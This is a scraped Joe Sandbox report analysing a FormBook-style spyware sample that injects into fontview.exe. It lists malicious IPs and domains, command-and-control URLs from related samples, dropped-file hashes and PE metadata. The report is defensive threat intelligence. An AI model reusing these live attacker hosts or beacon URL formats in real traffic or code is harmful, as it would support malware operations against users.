                                                                            https://www.domainnameshop.com/fontview.exe, 0000000A.00000002.4743802201.00000000059B4000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000A.00000002.4745385758.0000000007C90000.00000004.00000800.00020000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002C74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2853024183.000000000A014000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.reg.ru/sozdanie-saita/fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              high
                                                                              http://shkip2dom.com/LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000003904000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://js.ad-stir.com/js/adstir.js?20130527fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://static.minne.com/files/banner/minne_600x500fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  109.70.26.37
                                                                                  www.mrpokrovskii.proRussian Federation
                                                                                  48287RU-CENTERRUtrue
                                                                                  163.44.185.183
                                                                                  www.sankan-fukushi.infoJapan7506INTERQGMOInternetIncJPtrue
                                                                                  20.2.249.7
                                                                                  www.7vh2wy.topUnited States
                                                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                  103.224.182.242
                                                                                  www.madhf.techAustralia
                                                                                  133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                  172.67.197.57
                                                                                  www.lsfanarolt.shopUnited States
                                                                                  13335CLOUDFLARENETUStrue
                                                                                  76.223.74.74
                                                                                  ssl.goentri.comUnited States
                                                                                  16509AMAZON-02UStrue
                                                                                  208.115.225.220
                                                                                  www.atendefacil.infoUnited States
                                                                                  46475LIMESTONENETWORKSUStrue
                                                                                  188.114.96.3
                                                                                  www.rtpwslot888gol.sbsEuropean Union
                                                                                  13335CLOUDFLARENETUStrue
                                                                                  20.2.36.112
                                                                                  mmd.dnsmmd.comUnited States
                                                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                  68.66.226.92
                                                                                  www.717hy.netUnited States
                                                                                  55293A2HOSTINGUStrue
                                                                                  50.18.131.220
                                                                                  domains-38.cribflyer.comUnited States
                                                                                  16509AMAZON-02UStrue
                                                                                  203.161.46.205
                                                                                  www.ecojomos.xyzMalaysia
                                                                                  45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                  185.134.245.113
                                                                                  www.bahaeng.comNorway
                                                                                  12996DOMENESHOPOsloNorwayNOtrue
                                                                                  194.58.112.174
                                                                                  www.sklad-iq.onlineRussian Federation
                                                                                  197695AS-REGRUtrue
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1555193
                                                                                  Start date and time:2024-11-13 15:32:03 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 10m 45s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:11
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:2
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:Item-RQF-9456786.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@11/7@18/14
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 80%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 92%
                                                                                  • Number of executed functions: 81
                                                                                  • Number of non-executed functions: 270
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: Item-RQF-9456786.exe
                                                                                  TimeTypeDescription
                                                                                  09:33:21API Interceptor1x Sleep call for process: Item-RQF-9456786.exe modified
                                                                                  09:33:24API Interceptor18x Sleep call for process: powershell.exe modified
                                                                                  09:34:28API Interceptor11462952x Sleep call for process: fontview.exe modified
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  109.70.26.37Cmbwwkcevcglau.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                  • www.xn--d1acnfnmta.xn--p1ai/pn4e/?PVWk=f3HgyfoZyN&ya3hZ6=Axqd9uYmYp7orgQRubN12KIz0ETn9asgfk1mJK/Z6DbIFwnZ/4JiG197Yvj4xywBazNpNhV4fsXABdsflsvXc8+TStbsRm/06Q==
                                                                                  Uevsumfxudvvsf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                  • www.xn--d1acnfnmta.xn--p1ai/pn4e/
                                                                                  SecuriteInfo.com.Variant.Babar.161191.3845.26747.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.art-world.gallery/d82s/?10f=JpK121UpvTpc63rRp+gDJCCdgOsyWOtnd1+5GwkwMtQXrqOXZW8giVHgVA/EVEtRUGaZBcKLcc+iDZn9KexNjAxwg4PMjxbaWQ==&p5TzJe=IDSTB-Oy
                                                                                  OUTSTANDING_PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.landlotto.ru/0oqq/?ICHyvj5=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7+lksDMuqQ2YrnfA==&qt9TW=60_ljPJoqo6d2
                                                                                  031002200411_85416475.vbsGet hashmaliciousFormBookBrowse
                                                                                  • www.landlotto.ru/8bfi/?zWlew1c=A2R81uzLvS0WmEZs04/BP8N0Gjc/1cZcLvuM3RKwCSd5NfyML6VBFcfDSbjtAw22etViIiX2xpSo0klfeHLPYGaSbH+bfsHC3w==&OgJSC=ZGqA1YcB
                                                                                  DHL.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.landlotto.ru/0oqq/?Ruu6XZ=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7/rH4CMublm7Haah6y5P+nmPrL&2bZBp4=SbhpRad-bNU
                                                                                  Payment advise.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.commandos-g.com/s44m/?JXr6I=0Xrb9TeaJ6QMFzil1wJub0qcCdbijbT0/wHKDC0TYNA+ECGM5nziUQ10KwMvt1kD3WoO5wOCVaMWu5wQhMioCAzLm0G93xdpHA==&Wu5p=T5ASsiZg7veLY
                                                                                  Receipt.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • www.landlotto.ru/0oqq/?yUZlwOT5=zVtcFUb2erpe1riHMkA+/+PLDdvnZOilBrPOkTLBlxKebXbCPRW4F7hHIT/4WhPpl+5XC4kkcR4ywvq/sd7/lmwCNrvm2YvKeA==&WwsB=qH_5y
                                                                                  HSBC Payment Advice _pdf.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.commandos-g.com/s44m/?Ud=0Xrb9TeaJ6QMFzil1wJub0qcCdbijbT0/wHKDC0TYNA+ECGM5nziUQ10KwMvt1kD3WoO5wOCVaMWu5wQhMioCBrWrTq9lBVhHA==&JT=n5Pj6Rg4D3GGw
                                                                                  Invoice_78682.vbsGet hashmaliciousFormBookBrowse
                                                                                  • www.landlotto.ru/8bfi/?iys=A2R81uzLvS0WmEZs04/BP8N0Gjc/1cZcLvuM3RKwCSd5NfyML6VBFcfDSbjtAw22etViIiX2xpSo0klfeHLPYGaSbH+bfsHC3w==&jYo2=kvmTysEL4S
                                                                                  163.44.185.183order I 018629.xlsxGet hashmaliciousFormBookBrowse
                                                                                  • www.hihoha-menu.com/g24i/?Ij=C5lZ/tNmDIazGhz+mgSCdtEua581lzsfl6vwo2v3mqTQwnv5rjnUBpQzMVK0NvbkQlVLQw==&0f=e0DHTPtxAZK
                                                                                  20.2.249.7Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.adsa6c.top/wr26/
                                                                                  Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.adsa6c.top/wr26/
                                                                                  REQST_PRC 410240665_2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.km7ky4.top/bx7a/
                                                                                  REQST_PRC 410240.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.km7ky4.top/bx7a/
                                                                                  PO 18-3081.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.km7ky4.top/sb22/
                                                                                  rRFQ.bat.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.km7ky4.top/vawg/
                                                                                  INVG0088 LHV3495264 BL327291535V.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.km7ky4.top/bx7a/
                                                                                  PI#220824.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.8auvih.top/iwsn/
                                                                                  PURCHASE ORDER_330011 SEPTEMBER 2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.km7ky4.top/bx7a/
                                                                                  PI #9100679047.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.8auvih.top/iwsn/?gLc=954R46Wvx7n5T5KmTAnXXU7c5sLMP21esxIuNAnYAqeAvOaVtLyGHXgDG+9pDjEdQAJe3x02PhQzxke8Oe2Iq6h+ey0690ZMgK9npYwF/LLyY1w9way6Y1E=&6fQ=evG0
                                                                                  No context
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  INTERQGMOInternetIncJPTT copy.exeGet hashmaliciousFormBookBrowse
                                                                                  • 150.95.254.16
                                                                                  botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 150.95.219.222
                                                                                  spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 157.7.100.20
                                                                                  RO2Y11yOJ7.exeGet hashmaliciousFormBookBrowse
                                                                                  • 150.95.254.16
                                                                                  DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                                  • 163.44.176.12
                                                                                  r6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                                                                  • 133.130.35.90
                                                                                  SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exeGet hashmaliciousFormBookBrowse
                                                                                  • 150.95.254.16
                                                                                  debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeGet hashmaliciousFormBookBrowse
                                                                                  • 150.95.254.16
                                                                                  IMPORT PERMITS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 163.44.176.12
                                                                                  draft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                  • 163.44.176.12
                                                                                  MICROSOFT-CORP-MSN-AS-BLOCKUSfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                  • 94.245.104.56
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 13.107.246.45
                                                                                  FW Important Exploit Has Been Identified In Your Account Steps to Resolve.msgGet hashmaliciousUnknownBrowse
                                                                                  • 52.109.28.46
                                                                                  nK1cgEhvAP.exeGet hashmaliciousUnknownBrowse
                                                                                  • 21.35.197.16
                                                                                  https://cbsaao27.s3.us-east-1.amazonaws.com/res.html#cGF0cmljay5hbWZ0QG1zaWctZXVyb3BlLmNvbQ==Get hashmaliciousBlackHacker JS Obfuscator, HTMLPhisherBrowse
                                                                                  • 13.107.246.45
                                                                                  https://wmrc.titurimplec.com/HA02SW/Get hashmaliciousUnknownBrowse
                                                                                  • 13.107.246.45
                                                                                  Xeno Executor Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.246.57
                                                                                  Xeno Executor Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                  • 23.101.168.44
                                                                                  http://track.reviewmgr.com/ls/click?upn=u001.W5y-2Fhe84rCuLxXDO470nfuKD2Iz98QeQpE-2BkxRR0H-2BqB5cDKklujIJ5FLru7QrAASOSa17vR-2FSCLVAx4lWyy5Q-3D-3DNnGv_Yp4ydSxZWNatis3HtI6bBrJjg57JYwT6kbyY2f89Z-2FBhxNJZyCBl9w6yXNV0YfiKUAGjaILaAN0mF43Ydvv3aAXjCPBMrYvHXhqj-2F90M8IWSluK-2FDr0h4-2FIbAXpExZIWOjtRSKBCrpvm-2BHKZd6Q2itOPvvv8Wh8uHJq1rbQgzA92MMGG0eeFCZzQMnosAWydLTI7R4yQPl90fJpGVjewvRcCF77tY5-2B3PAHwq6SU-2Fc2kSK8E1mMumIEdp0dsw2BfptVK6-2FXO4Hh-2FAV8-2FJ5YFUs6qp3oyRx3LiWrBnDVYrVE-3DGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.137.11
                                                                                  http://t.nypost.com/1/e/r?aqet=clk&r=2&ca=26510028&v0=aftua%40gmail.com&ru=//www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://digitalplatform-admin-p.azurewebsites.net/external-link/?targetURL=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%SERIAL%25wDnNeW8yycT&sa=t&esrc=nNeW8F%SERIAL%25A0xys8Em2FL&source=&cd=tS6T8%SERIAL%25Tiw9XH&cad=XpPkDfJX%SERIAL%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%62%79%64%61%2E%6E%67%2F%63%69%67%2E%62%69%6E%2F%67%67%6C%6E%46%78%50%51%30%47%76%38%64%43%45%35%45%43%61%37%66%37%78%63%58%71%32%79%74%4D%57%65%54%6E%31%37%53%74%68%66%4C%56%74%52%44%70%4E%58%36%63%6B%42%66%50%7A%42%38%6B%51%52%36%38%64%67%53%64%31%4C%6C%73%33%71%37%76%6E%79%6E%48%6D%75%41%73%31%2F%23Y2hyaXN0b3BoZXIuZG9sYW5AdmlyZ2lubW9uZXkuY29tGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                  • 13.107.246.45
                                                                                  RU-CENTERRUx86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 195.209.89.193
                                                                                  PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.24.68.25
                                                                                  RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                  • 194.85.61.76
                                                                                  LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                                  • 194.85.61.76
                                                                                  k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.24.68.25
                                                                                  invoice.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.24.68.25
                                                                                  PO#86637.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.24.68.25
                                                                                  PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.24.68.25
                                                                                  ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.24.68.25
                                                                                  ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.24.68.25
                                                                                  No context
                                                                                  No context
                                                                                  Process:C:\Users\user\Desktop\Item-RQF-9456786.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1216
                                                                                  Entropy (8bit):5.34331486778365
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                  Malicious:true
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2232
                                                                                  Entropy (8bit):5.380805901110357
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
                                                                                  MD5:16AD599332DD2FF94DA0787D71688B62
                                                                                  SHA1:02F738694B02E84FFE3BAB7DE5709001823C6E40
                                                                                  SHA-256:452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
                                                                                  SHA-512:A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
                                                                                  Malicious:false
                                                                                  Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                  Process:C:\Windows\SysWOW64\fontview.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):7.84678241128094
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  File name:Item-RQF-9456786.exe
                                                                                  File size:726'016 bytes
                                                                                  MD5:2980d8a9894fb28427f03922f74d1c76
                                                                                  SHA1:615db143a4eaca8788e1110be17e3c2144a594fc
                                                                                  SHA256:c38ac70a0c3bcc6f2f94c6ba1f74365666a20bd8fa7ed97e6c343dcf998f0535
                                                                                  SHA512:55f5508e32b62f915ec67f4e230bc10a7e27f17ea5215b56d0374c2987ddf82eeed040cfb499717be9adb7627cf490baf33b1171b29bd03f5d108b7be1b1f482
                                                                                  SSDEEP:12288:HMyCEyk+AEWTCAJKJdy39PF1w6MgpEEC57g/Hg/elSymFFGSR/7po:HMySoTJKJsNPFVMBelSfZJK
                                                                                  TLSH:13F412747125E516D9E91BF80A21E3BA07B25D4DE911D3078EFEECEB3C19B0A7904253
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J.4g..............0..............)... ...@....@.. ....................................`................................
                                                                                  Icon Hash:00928e8e8686b000
                                                                                  Entrypoint:0x4b29ce
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6734064A [Wed Nov 13 01:52:10 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
